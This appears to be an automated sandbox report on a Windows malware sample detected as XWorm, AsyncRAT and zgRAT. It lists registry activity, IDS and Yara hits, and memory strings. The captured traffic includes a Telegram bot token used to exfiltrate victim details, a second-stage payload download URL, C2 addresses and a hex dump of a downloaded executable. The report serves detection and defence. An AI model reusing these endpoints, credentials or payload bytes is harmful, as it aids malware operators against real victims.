Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 157.254.223.19:8081 -> 192.168.2.5:49797

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 185.196.10.233 ports 39001,0,1,3,80,9

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED
Source: Yara match	File source: C:\ProgramData\btjxg.exe, type: DROPPED

Source: global traffic	TCP traffic: 192.168.2.5:49726 -> 185.196.10.233:39001
Source: global traffic	TCP traffic: 192.168.2.5:49797 -> 157.254.223.19:8081

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 26 Mar 2024 17:23:16 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 25 Mar 2024 19:48:20 GMTETag: "25200-6148174a2032a"Accept-Ranges: bytesContent-Length: 152064Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 66 be 01 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 96 00 00 00 ba 01 00 00 00 00 00 1e b4 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 02 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c4 b3 00 00 57 00 00 00 00 c0 00 00 ac b7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 02 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 94 00 00 00 20 00 00 00 96 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 ac b7 01 00 00 c0 00 00 00 b8 01 00 00 98 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 02 00 00 02 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 00 00 00 00 00 00 48 00 00 00 02 00 05 00 90 58 00 00 34 5b 00 00 01 00 00 00 14 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 01 00 0f 00 00 00 01 00 00 11 7e 01 00 00 04 6f 0a 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 02 00 00 11 7e 02 00 00 04 6f 0b 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 03 00 00 11 7e 03 00 00 04 6f 0c 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 04 00 00 11 7e 04 00 00 04 6f 0d 00 00 0a 0a 2b 00 06 2a 00 13 30 02 00 11 00 00 00 05 00 00 11 02 03 28 11 00 00 0a 28 12 00 00 0a 0a 2b 00 06 2a 00 00 00 13 30 01 00 0b 00 00 00 06 00 00 11 02 28 13 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0f 00 00 00 07 00 00 11 d0 05 00 00 02 28 14 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 02 28 15 00 00 0a 0a 2b 00 06 2a 00 13 30 01 00 18 00 00 00 09 00 00 11 02 8c 01 00

Source: global traffic	HTTP traffic detected: GET /bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=1267602057&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A9FCA14390BF6B97E9DB7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dggfsff.exe HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View	ASN Name: TECHNICOLORUS TECHNICOLORUS
Source: Joe Sandbox View	ASN Name: SIMPLECARRIERCH SIMPLECARRIERCH

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	TCP traffic detected without corresponding DNS query: 157.254.223.19
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=1267602057&text=%E2%98%A0%20%5BXWorm%20V3.0%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A9FCA14390BF6B97E9DB7%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /dggfsff.exe HTTP/1.1Host: 185.196.10.233Connection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: gjhfhgdg.insane.wang

Source: RegSvcs.exe, 00000003.00000002.3376937115.000001E3B95A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.196.10.233/dggfsff.exe
Source: btjxg.exe, 00000004.00000002.3374102569.000000000316E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 0000000D.00000002.2821942479.000002801EE5C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 0000000A.00000002.2555794283.000001ECF40A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000005.00000002.2367987837.000002AEC8A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2133348072.00000234352C0000.00000004.00000020.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2135768597.000002343558D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft
Source: powershell.exe, 00000005.00000002.2314219862.000002AEB8C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341CCE2000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3376937115.000001E3B9201000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3376937115.000001E3B94D8000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2314219862.000002AEB8A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.00000280069E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.2314219862.000002AEB8C29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000005.00000002.2314219862.000002AEB8A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2417088694.000001EC80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2642051450.00000280069E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegrP
Source: btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: btjxg.exe, 00000004.00000002.3366251779.0000000001312000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/
Source: RegSvcs.exe, 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3374102569.0000000003071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, btjxg.exe, 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, btjxg.exe.3.dr, btjxg.exe.4.dr	String found in binary or memory: https://api.telegram.org/bot
Source: btjxg.exe, 00000004.00000002.3374102569.0000000003152000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5498061286:AAEOFPFhizSA_AbkzDV_OWcHlXVsegPpL_c/sendMessage?chat_id=12676
Source: powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.2642051450.0000028006C09000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000002.00000002.2158779274.000002184EA06000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3409147293.000001E3C9A46000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2610110087.0000020937526000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: powershell.exe, 00000005.00000002.2367987837.000002AEC8A73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2529744387.000001EC90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.2775890148.0000028016A52000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: TypeId.exe, 00000007.00000002.2591573237.0000020926CE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp, 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49794 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\AppData\Local\Temp\btjxg.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92db520.4.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.btjxg.exe.13079ac0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.0.btjxg.exe.de0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 4.2.btjxg.exe.13079ac0.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cd134c8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cc53458.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342ce13500.5.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0.2.9NBx4Vmiuj.exe.2342cc93490.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000003.00000002.3409147293.000001E3C92B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000004.00000002.3382459280.0000000013071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects zgRAT Author: ditekSHen
Source: 00000004.00000000.2204688783.0000000000DE2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\btjxg.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: 9NBx4Vmiuj.exe, Program.cs

Large array initialization: Main: array initializer size 641201

Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe

Code function: 2_2_00007FF848A16FBD NtUnmapViewOfSection,

2_2_00007FF848A16FBD

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B1AB1	0_2_00007FF8489B1AB1
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B1BA9	0_2_00007FF8489B1BA9
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B5B12	0_2_00007FF8489B5B12
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B15A9	0_2_00007FF8489B15A9
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B629D	0_2_00007FF8489B629D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B0848	0_2_00007FF8489B0848
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B63A9	0_2_00007FF8489B63A9
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B63E8	0_2_00007FF8489B63E8
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B6331	0_2_00007FF8489B6331
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B630E	0_2_00007FF8489B630E
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B636D	0_2_00007FF8489B636D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B3CD3	0_2_00007FF8489B3CD3
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B6421	0_2_00007FF8489B6421
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B3BFB	0_2_00007FF8489B3BFB
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B3C08	0_2_00007FF8489B3C08
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B6477	0_2_00007FF8489B6477
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B6457	0_2_00007FF8489B6457
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B5593	0_2_00007FF8489B5593
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B76AC	0_2_00007FF8489B76AC
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B3F9D	0_2_00007FF8489B3F9D
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B1793	0_2_00007FF8489B1793
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF8489B3FD3	0_2_00007FF8489B3FD3
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF848A81B44	0_2_00007FF848A81B44
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF848A83424	0_2_00007FF848A83424
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF848A82F10	0_2_00007FF848A82F10
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF848B60D41	0_2_00007FF848B60D41
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Code function: 0_2_00007FF848B61FFA	0_2_00007FF848B61FFA
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489B76AC	2_2_00007FF8489B76AC
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489B4000	2_2_00007FF8489B4000
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489ECAD0	2_2_00007FF8489ECAD0
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489E5628	2_2_00007FF8489E5628
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489E5648	2_2_00007FF8489E5648
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489E83F8	2_2_00007FF8489E83F8
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489E9CC0	2_2_00007FF8489E9CC0
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489B1AE6	2_2_00007FF8489B1AE6
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489B1BA9	2_2_00007FF8489B1BA9
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A06582	2_2_00007FF848A06582
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A111A8	2_2_00007FF848A111A8
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489F79ED	2_2_00007FF8489F79ED
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A057D6	2_2_00007FF848A057D6
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF8489F5849	2_2_00007FF8489F5849
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A81B44	2_2_00007FF848A81B44
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A82F10	2_2_00007FF848A82F10
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A83424	2_2_00007FF848A83424
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 2_2_00007FF848A83264	2_2_00007FF848A83264
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D15A9	3_2_00007FF8489D15A9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D1AE6	3_2_00007FF8489D1AE6
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D1BA9	3_2_00007FF8489D1BA9
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D76AC	3_2_00007FF8489D76AC
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D3F9D	3_2_00007FF8489D3F9D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D3FD3	3_2_00007FF8489D3FD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D3CD3	3_2_00007FF8489D3CD3
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D3BFB	3_2_00007FF8489D3BFB
